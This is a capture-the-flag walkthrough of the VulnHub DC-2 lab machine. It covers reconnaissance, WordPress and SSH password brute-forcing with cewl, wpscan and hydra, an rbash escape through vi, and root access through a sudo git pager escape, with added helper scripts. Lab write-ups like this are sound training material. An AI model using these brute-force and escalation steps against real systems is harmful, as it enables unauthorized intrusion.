Target machine: https://www.vulnhub.com/entry/dc-2,311/
Goal: there are five flags including the final flag. The only flag that really counts is the final flag.
Host information
- Kali: 192.168.11.131
- DC-2: 192.168.11.138
Walkthrough
1. Host discovery
Start with host discovery on the local segment to find the target's IP address:
arp-scan -l
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.11.131
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1 00:50:56:f3:b5:59 VMware, Inc.
192.168.11.138 00:0c:29:2c:b6:45 VMware, Inc.
192.168.11.254 00:50:56:ed:2e:ad VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.063 seconds (124.09 hosts/sec). 3 responded
Kali itself is .131 and the 00:50:56 addresses are VMware's own host-side interfaces, so DC-2 is 192.168.11.138.
2. Port scan
Full TCP port scan of DC-2 with nmap, with service/version detection:
nmap -sV -p- 192.168.11.138
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.11.138
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-20 14:15 CST
Nmap scan report for dc-2 (192.168.11.138)
Host is up (0.00062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 00:0C:29:2C:B6:45 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.44 seconds
Port 80 runs a web server (Apache 2.4.10 on Debian) and SSH listens on the non-default port 7744.
3. Web enumeration
Browsing directly to http://192.168.11.138/
the page just spins without loading,
and finally redirects to http://dc-2/
where the page fails to load. Firefox's error page reads:
Hmm. We're having trouble finding that site.
We can't connect to the server at dc-2.
If that address is correct, here are three other things you can try:
Try again later.
Check your network connection.
If you are connected but behind a firewall, check that Firefox has permission to access the Web.
The application redirects to its configured hostname dc-2, which Kali cannot resolve. Add a static entry to /etc/hosts so that name maps to the target (this is a local hosts-file override, not DNS):
192.168.11.138 dc-2
┌──(root㉿kali)-[~]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.11.138 dc-2
After the change the site loads.
4. flag1
Enumerating the web application shows it is WordPress 4.7.10,
and http://dc-2/index.php/flag/
contains flag1 together with the hint for the next flag:
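The hosts-file fix above can be scripted so the redirect target is read from the server's own Location header instead of being typed by hand. This is an added example, not part of the original writeup; the HTTP response text is constructed to mimic what DC-2 returns, and the exact header set is an assumption.

```sh
# Added example (not from the original writeup): take a raw HTTP response
# as printed by `curl -sI http://192.168.11.138/`, pull the hostname out of
# the Location header and emit the /etc/hosts line that maps it back to
# the IP we scanned. The response below is constructed for the demo.
SAMPLE_RESPONSE='HTTP/1.1 301 Moved Permanently
Date: Thu, 20 Apr 2023 06:20:00 GMT
Server: Apache/2.4.10 (Debian)
Location: http://dc-2/
Content-Type: text/html; charset=UTF-8
'

# redirect_host RESPONSE -> host part of the Location header, or nothing
# when the response is not a redirect.
redirect_host() {
    printf '%s\n' "$1" \
        | tr -d '\r' \
        | awk 'tolower($1) == "location:" { print $2; exit }' \
        | sed -E 's#^[a-zA-Z]+://##; s#[/:].*$##'
}

# hosts_line IP RESPONSE -> "IP host", fails when there is no redirect.
hosts_line() {
    host=$(redirect_host "$2")
    [ -n "$host" ] || return 1
    printf '%s %s\n' "$1" "$host"
}

# hosts_has FILE HOST -> true if HOST already appears as a name on any
# non-comment line (aliases included), so re-runs stay idempotent.
hosts_has() {
    awk -v h="$2" '$1 !~ /^#/ { for (i = 2; i <= NF; i++) if ($i == h) f = 1 } END { exit !f }' "$1"
}

# add_hosts_entry IP RESPONSE [HOSTS_FILE] appends the mapping only when
# the hostname is not already present in that file.
add_hosts_entry() {
    file=${3:-/etc/hosts}
    line=$(hosts_line "$1" "$2") || return 1
    host=${line#* }
    if hosts_has "$file" "$host"; then
        printf 'already present: %s\n' "$host"
    else
        printf '%s\n' "$line" >> "$file"
        printf 'added: %s\n' "$line"
    fi
}

# Dry run against a temporary copy instead of the real /etc/hosts.
tmp_hosts=$(mktemp)
printf '127.0.0.1 localhost\n' > "$tmp_hosts"
add_hosts_entry 192.168.11.138 "$SAMPLE_RESPONSE" "$tmp_hosts"
add_hosts_entry 192.168.11.138 "$SAMPLE_RESPONSE" "$tmp_hosts"
cat "$tmp_hosts"
rm -f "$tmp_hosts"
```

On the real box, replace SAMPLE_RESPONSE with `"$(curl -sI http://192.168.11.138/)"` and drop the third argument to write to /etc/hosts (as root). Note the check only looks at the hosts file; if the name already resolves through DNS the entry is still added, which is what you want for a CTF override.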
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
5. flag2
The hint points at the WordPress admin login, which sits at the default /wp-login.php (dirb would also find it).
It loads, so the plan is a username + password brute force.
Following the "cewl" hint, crawl the site to build a password list from its own words:
cewl http://dc-2/ -w pass.txt
-w, --write: write the output to a file.
┌──(root㉿kali)-[~]
└─# cewl http://dc-2/ -w pass.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
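Why a site-specific list works here: the two passwords that fall out later (adipiscing, parturient) are lorem-ipsum words taken straight from the page body, which no generic wordlist contains. The following is an added example, not from the original writeup or from cewl itself: a minimal cewl-style word harvester in POSIX shell, run over a constructed HTML snippet (the real DC-2 page content beyond those two words is not reproduced).

```sh
# Added example (not from the original writeup): strip tags from an HTML
# page, split it into words, keep those of at least MIN_LEN letters and
# dedupe them in order of first appearance, which is roughly what
# `cewl -w pass.txt` does. The page snippet is constructed for the demo.
SAMPLE_HTML='<html><head><title>DC-2 &#8211; Just another WordPress site</title></head>
<body><h1 class="entry-title">Welcome</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla
parturient montes, nascetur ridiculus mus. Adipiscing again.</p>
<script>var x = "ignoreMeScript";</script>
</body></html>'

# harvest_words MIN_LEN  (reads HTML on stdin, prints one word per line)
# - drops <script>...</script> blocks that sit on a single line
# - replaces tags and HTML entities with whitespace
# - splits on anything that is not a letter
# - keeps case (cewl does too unless --lowercase) and dedupes in order
harvest_words() {
    min=${1:-3}
    sed -e 's/<script[^>]*>.*<\/script>//g' \
        -e 's/<[^>]*>/ /g' \
        -e 's/&[#a-zA-Z0-9]*;/ /g' \
        | tr -cs 'A-Za-z' '\n' \
        | awk -v m="$min" 'length($0) >= m && !seen[$0]++'
}

# make_wordlist HTML [MIN_LEN] -> the candidate password list.
make_wordlist() {
    printf '%s\n' "$1" | harvest_words "${2:-3}"
}

# Usage on a live target would be:
#   make_wordlist "$(curl -s http://dc-2/)" 3 > pass.txt
make_wordlist "$SAMPLE_HTML" 3
```

The output feeds `wpscan -P` and `hydra -P` exactly like cewl's file. Real cewl also follows links to a configurable depth and can harvest e-mail addresses; this example only covers one page.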
Since the site is WordPress, use wpscan to enumerate usernames:
wpscan --url http://dc-2/ -e u
--url URL: the URL of the blog to scan
-e, --enumerate [OPTS]: enumeration process; available options include
u: user IDs range (usernames)
┌──(root㉿kali)-[~]
└─# wpscan --url http://dc-2/ -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Three users enumerated:
- admin
- jerry
- tom
Save the usernames to user.txt:
echo admin > user.txt ;echo jerry >> user.txt ;echo tom >> user.txt
Then brute-force the login with wpscan, using the cewl list as passwords:
wpscan --url http://dc-2/ -U user.txt -P pass.txt
-U, --usernames LIST: list of usernames to use during the password attack.
-P, --passwords FILE-PATH: list of passwords to use during the password attack.
┌──(root㉿kali)-[~]
└─# wpscan --url http://dc-2/ -U user.txt -P pass.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
Two valid credential pairs:
First pair
Username: jerry
Password: adipiscing
Second pair
Username: tom
Password: parturient
Both accounts log in to the dashboard successfully.
In the Pages list of jerry's account there is a page holding flag2 and the hint for the remaining flags:
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
6. flag3
The first idea was to get a shell through a plugin or theme upload, but the hint says the intended route is not through WordPress and that there is "another entry point".
The only other service is SSH on 7744, so test the recovered credentials there (password reuse) by running hydra over the same two lists:
hydra -L user.txt -P pass.txt ssh://192.168.11.138 -s 7744
-l LOGIN or -L FILE: log in with LOGIN, or load several logins from FILE
-p PASS or -P FILE: try password PASS, or load several passwords from FILE
-s PORT: if the service runs on a non-default port, define it here
┌──(root㉿kali)-[~]
└─# hydra -L user.txt -P pass.txt ssh://192.168.11.138 -s 7744
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-20 15:41:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 714 login tries (l:3/p:238), ~45 tries per task
[DATA] attacking ssh://192.168.11.138:7744/
[STATUS] 156.00 tries/min, 156 tries in 00:01h, 560 to do in 00:04h, 14 active
[STATUS] 107.33 tries/min, 322 tries in 00:03h, 402 to do in 00:04h, 6 active
[STATUS] 67.43 tries/min, 472 tries in 00:07h, 252 to do in 00:04h, 6 active
[7744][ssh] host: 192.168.11.138 login: tom password: parturient
[STATUS] 60.33 tries/min, 724 tries in 00:12h, 1 to do in 00:01h, 1 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-20 15:53:56
hydra finds one valid SSH login, tom's WordPress password reused:
- Username: tom
- Password: parturient
Log in over SSH:
ssh tom@192.168.11.138 -p 7744
┌──(root㉿kali)-[~]
└─# ssh tom@192.168.11.138 -p 7744
The authenticity of host '[192.168.11.138]:7744 ([192.168.11.138]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.11.138]:7744' (ED25519) to the list of known hosts.
tom@192.168.11.138's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$
flag3 is in tom's home directory:
tom@DC-2:~$ ls -al
total 40
drwxr-x--- 3 tom tom 4096 Mar 21 2019 .
drwxr-xr-x 4 root root 4096 Mar 21 2019 ..
-rwxr-x--- 1 tom tom 66 Mar 21 2019 .bash_history
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .bash_login
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .bash_logout
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .bash_profile
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .bashrc
-rwxr-x--- 1 tom tom 95 Mar 21 2019 flag3.txt
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .profile
drwxr-x--- 3 tom tom 4096 Mar 21 2019 usr
But cat is not found: the login shell is rbash (restricted bash) with PATH pinned to a private bin directory, so only the commands placed there resolve:
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
List everything the shell can run:
compgen -c
tom@DC-2:~$ compgen -c
if
then
else
elif
fi
case
esac
for
select
while
until
do
done
in
function
time
{
}
!
[[
]]
coproc
__expand_tilde_by_ref
__get_cword_at_cursor_by_ref
__git_eread
__git_ps1
__git_ps1_colorize_gitstring
__git_ps1_show_upstream
__grub_dir
__grub_get_last_option
__grub_get_options_from_help
__grub_get_options_from_usage
__grub_list_menuentries
__grub_list_modules
__grubcomp
__ltrim_colon_completions
__parse_options
__reassemble_comp_words_by_ref
_a2disconf
_a2dismod
_a2dissite
_a2enconf
_a2enmod
_a2ensite
_allowed_groups
_allowed_users
_apache2_allcomp
_apache2_conf
_apache2_mods
_apache2_sites
_available_interfaces
_cd
_cd_devices
_command
_command_offset
_complete_as_root
_completion_loader
_configured_interfaces
_count_args
_debconf_show
_dvd_devices
_expand
_filedir
_filedir_xspec
_fstypes
_get_comp_words_by_ref
_get_cword
_get_first_arg
_get_pword
_gids
_grub_editenv
_grub_install
_grub_mkconfig
_grub_mkfont
_grub_mkimage
_grub_mkpasswd_pbkdf2
_grub_mkrescue
_grub_probe
_grub_script_check
_grub_set_entry
_grub_setup
_have
_init_completion
_insserv
_installed_modules
_ip_addresses
_kernel_versions
_known_hosts
_known_hosts_real
_longopt
_mac_addresses
_minimal
_modules
_ncpus
_parse_help
_parse_usage
_pci_ids
_pgids
_pids
_pnames
_pygmentize
_quote_readline_by_ref
_realcommand
_rl_enabled
_root_command
_service
_services
_shells
_signals
_split_longopt
_sysvdirs
_terms
_tilde
_uids
_update_initramfs
_upvar
_upvars
_usb_ids
_user_at_host
_usergroup
_userland
_variables
_xfunc
_xinetd_services
dequote
quote
quote_readline
.
:
[
alias
bg
bind
break
builtin
caller
cd
command
compgen
complete
compopt
continue
declare
dirs
disown
echo
enable
eval
exec
exit
export
false
fc
fg
getopts
hash
help
history
jobs
kill
let
local
logout
mapfile
popd
printf
pushd
pwd
read
readarray
readonly
return
set
shift
shopt
source
suspend
test
times
trap
true
type
typeset
ulimit
umask
unalias
unset
wait
less
scp
ls
vi
Everything above the last four entries is a bash builtin or completion function; the only external commands on PATH are less, scp, ls and vi (ls /home/tom/usr/bin shows the same). vi is available, and opening flag3 with it reveals the hint:
vi flag3.txt
tom@DC-2:~$ vi flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
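Rather than scrolling through compgen -c, the quick question in a restricted shell is "which external binaries are on PATH, and which of them can spawn a subshell". The script below is an added example, not part of the original writeup: it lists the executables on a PATH and flags the ones that are known shell escapes. The escape list is a subset of the GTFOBins "shell" entries and is an assumption, and the demo PATH is a temporary directory built to mirror DC-2's /home/tom/usr/bin (less, scp, ls, vi) rather than the real one.

```sh
# Added example (not from the original writeup): enumerate the commands an
# rbash user can actually execute and flag the ones that can hand out a
# shell. Binaries listed in SHELL_CAPABLE are a subset of GTFOBins'
# "shell" category (assumption, not exhaustive).
SHELL_CAPABLE='vi vim less more man scp find awk nano python perl ed'

# path_commands PATH -> sorted unique names of executables in each element.
path_commands() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r dir; do
        [ -d "$dir" ] || continue
        for f in "$dir"/*; do
            [ -x "$f" ] && [ ! -d "$f" ] && printf '%s\n' "${f##*/}"
        done
    done | sort -u
}

# escape_candidates PATH -> the subset of path_commands that is shell-capable.
escape_candidates() {
    path_commands "$1" | while IFS= read -r cmd; do
        case " $SHELL_CAPABLE " in
            *" $cmd "*) printf '%s\n' "$cmd" ;;
        esac
    done
}

# Build a fake restricted bin dir standing in for DC-2's /home/tom/usr/bin.
demo=$(mktemp -d)
trap 'rm -rf "$demo"' EXIT
mkdir -p "$demo/usr/bin"
for c in less scp ls vi; do
    printf '#!/bin/sh\n' > "$demo/usr/bin/$c"
    chmod +x "$demo/usr/bin/$c"
done
DEMO_PATH="$demo/usr/bin"

# On the real box: escape_candidates "$PATH"
echo "commands on PATH: $(path_commands "$DEMO_PATH" | tr '\n' ' ')"
echo "shell-capable:    $(escape_candidates "$DEMO_PATH" | tr '\n' ' ')"
```

For DC-2 this reports less, scp and vi: vi gives the :shell escape used next, less gives `!sh` from its prompt, and scp can run an arbitrary program through its -S option. rbash itself blocks running scripts by path, so on the target this is typed interactively or run after the vi escape.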
7. flag4
The hint names both users, Tom and Jerry, and the su command.
Most commands are blocked by rbash, so break out through vi:
- open a file with vi (vi flag3.txt)
- in command mode run
:set shell=/bin/sh
:shell
This drops out of rbash into an unrestricted /bin/sh, but most commands still fail, because the new shell inherits the restricted PATH:
tom@DC-2:~$ vi flag3.txt
$ whoami
/bin/sh: 1: whoami: not found
$ id
/bin/sh: 2: id: not found
Following the hint, cd into jerry's home directory (the escaped shell permits cd, which rbash did not); flag4.txt is there, but cat is still not found:
$ cd /home/jerry
$ ls -al
total 28
drwxr-xr-x 2 jerry jerry 4096 Mar 21 2019 .
drwxr-xr-x 4 root root 4096 Mar 21 2019 ..
-rw------- 1 jerry jerry 109 Mar 21 2019 .bash_history
-rw-r--r-- 1 jerry jerry 220 Mar 21 2019 .bash_logout
-rw-r--r-- 1 jerry jerry 3515 Mar 21 2019 .bashrc
-rw-r--r-- 1 jerry jerry 223 Mar 21 2019 flag4.txt
-rw-r--r-- 1 jerry jerry 675 Mar 21 2019 .profile
$ cat flag4.txt
/bin/sh: 16: cat: not found
Read flag4.txt with vi:
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
8. flag5
The hint ("git outta here") points at git for the final flag,
but git is not available in this shell either:
$ git
/bin/sh: 26: git: not found
And su, which the flag3 hint suggested for switching to jerry, is not found either:
$ su jerry
/bin/sh: 21: su: not found
The environment explains it: PATH is still /home/tom/usr/bin, so the escaped sh sees the same four commands as rbash did. What has changed is that sh, unlike rbash, does not forbid cd or modifying PATH:
export -p
$ export -p
export HOME='/home/tom'
export LANG='en_US.UTF-8'
export LOGNAME='tom'
export MAIL='/var/mail/tom'
export OLDPWD='/home'
export PATH='/home/tom/usr/bin'
export PWD='/home/jerry'
export SHELL='/bin/rbash'
export SHLVL='1'
export SSH_CLIENT='192.168.11.131 55440 7744'
export SSH_CONNECTION='192.168.11.131 55440 192.168.11.138 7744'
export SSH_TTY='/dev/pts/0'
export TERM='xterm-256color'
export USER='tom'
export VIM='/usr/share/vim'
export VIMRUNTIME='/usr/share/vim/vim74'
export _='jerry'
Since the shell now allows changing variables, restore a normal PATH (rbash would have refused this):
export PATH=$PATH:/bin/ # extend PATH
export PATH=$PATH:/usr/bin/ # extend PATH
With PATH fixed, su works again. Switch to jerry with the WordPress password, which is reused here:
Username: jerry
Password: adipiscing
$ su - jerry
Password:
jerry@DC-2:~$ whoami
jerry
jerry@DC-2:~$ id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry)
jerry@DC-2:~$
git works now:
git --version
jerry@DC-2:~$ git --version
git version 2.1.4
Now for the git escalation. Per the hint, check with sudo -l whether jerry can run git with elevated rights:
sudo -l
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
For completeness, also list SUID binaries. Nothing unusual turns up (git is not SUID), so the sudo rule is the path to root:
find / -perm -u=s -type f 2>/dev/null
jerry@DC-2:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su
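A reusable version of the sudo -l check: parse the rule block and flag any command that can spawn a shell, which is what turns the `(root) NOPASSWD: /usr/bin/git` line into a finding. This is an added example, not from the original writeup; the sudo -l text is constructed to match what jerry sees on DC-2 plus one extra password-protected rule added to show the other case, and the shell-capable list is a subset of GTFOBins' sudo entries (an assumption, not exhaustive).

```sh
# Added example (not from the original writeup): parse `sudo -l` output
# and report runas user, whether a password is needed, and the command,
# then flag commands known to spawn a shell. The (root) /bin/ls rule is
# constructed for the demo; DC-2 only has the git rule.
SUDO_L='Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) /bin/ls'

# Subset of GTFOBins "sudo" entries (assumption, not exhaustive).
SUDO_SHELL_CAPABLE='git vi vim less more man find awk python perl bash sh env'

# sudo_rules TEXT -> one line per command: runas<TAB>auth<TAB>command
sudo_rules() {
    printf '%s\n' "$1" | awk '
        /may run the following commands/ { rules = 1; next }
        rules && /^[ \t]*\(/ {
            line = $0
            sub(/^[ \t]*/, "", line)
            runas = line
            sub(/\).*$/, "", runas)      # keep "(root"
            sub(/^\(/, "", runas)        # keep "root"
            sub(/^\([^)]*\)[ \t]*/, "", line)
            auth = "password"
            if (line ~ /^NOPASSWD:/) {
                auth = "nopasswd"
                sub(/^NOPASSWD:[ \t]*/, "", line)
            }
            n = split(line, cmds, /,[ \t]*/)   # one rule may list several commands
            for (i = 1; i <= n; i++) print runas "\t" auth "\t" cmds[i]
        }'
}

# shell_capable_sudo TEXT -> rules whose binary is in SUDO_SHELL_CAPABLE
shell_capable_sudo() {
    sudo_rules "$1" | while IFS="$(printf '\t')" read -r runas auth cmd; do
        base=${cmd%% *}          # drop any fixed arguments
        base=${base##*/}         # basename
        case " $SUDO_SHELL_CAPABLE " in
            *" $base "*) printf '%s %s %s\n' "$runas" "$auth" "$cmd" ;;
        esac
    done
}

# On a live target: shell_capable_sudo "$(sudo -n -l 2>/dev/null)"
echo "all rules:"
sudo_rules "$SUDO_L"
echo "shell-capable:"
shell_capable_sudo "$SUDO_L"
```

The parser deliberately stops at the command path: sudo rules can carry arguments, tags such as SETENV, and multiple runas users, which a full sudoers parser would have to handle. For a post-exploitation triage the runas user, the NOPASSWD flag and the binary name are the three things that decide whether the rule is exploitable.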
Escalation. git sends its help output through a pager (less by default), and from the less prompt the ! command runs an arbitrary program. With LESS unset, as it is after sudo's env_reset, git starts less with the F option, which exits immediately if the output fits on one screen, so the terminal window has to be narrow or short enough that the help text actually paginates. Two variants:
Method 1
sudo git help config
then, at the less prompt:
!/bin/bash
Method 2
sudo git -p help
then, at the less prompt:
!/bin/bash
Root obtained!
root@DC-2:/home/jerry# whoami
root
root@DC-2:/home/jerry# id
uid=0(root) gid=0(root) groups=0(root)
With root, change into /root and read flag5 (final-flag.txt):
cd /root/
cat final-flag.txt
root@DC-2:/home/jerry# cd /root/
root@DC-2:~# ls -al
total 32
drwx------ 2 root root 4096 Mar 21 2019 .
drwxr-xr-x 21 root root 4096 Mar 10 2019 ..
-rw------- 1 root root 212 Apr 19 11:41 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 427 Mar 21 2019 final-flag.txt
-rw------- 1 root root 46 Apr 19 11:41 .lesshst
-rw------- 1 root root 232 Mar 21 2019 .mysql_history
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
9. Summary
- /etc/hosts entry to follow the hostname redirect
- cewl to build a site-specific password list
- wpscan to enumerate users and brute-force the WordPress login
- hydra to brute-force SSH with the same lists (credential reuse)
- vi shell escape out of rbash
- PATH fix to leave the restricted environment behind
- sudo git pager escape to root
That completes the box. Game over OVO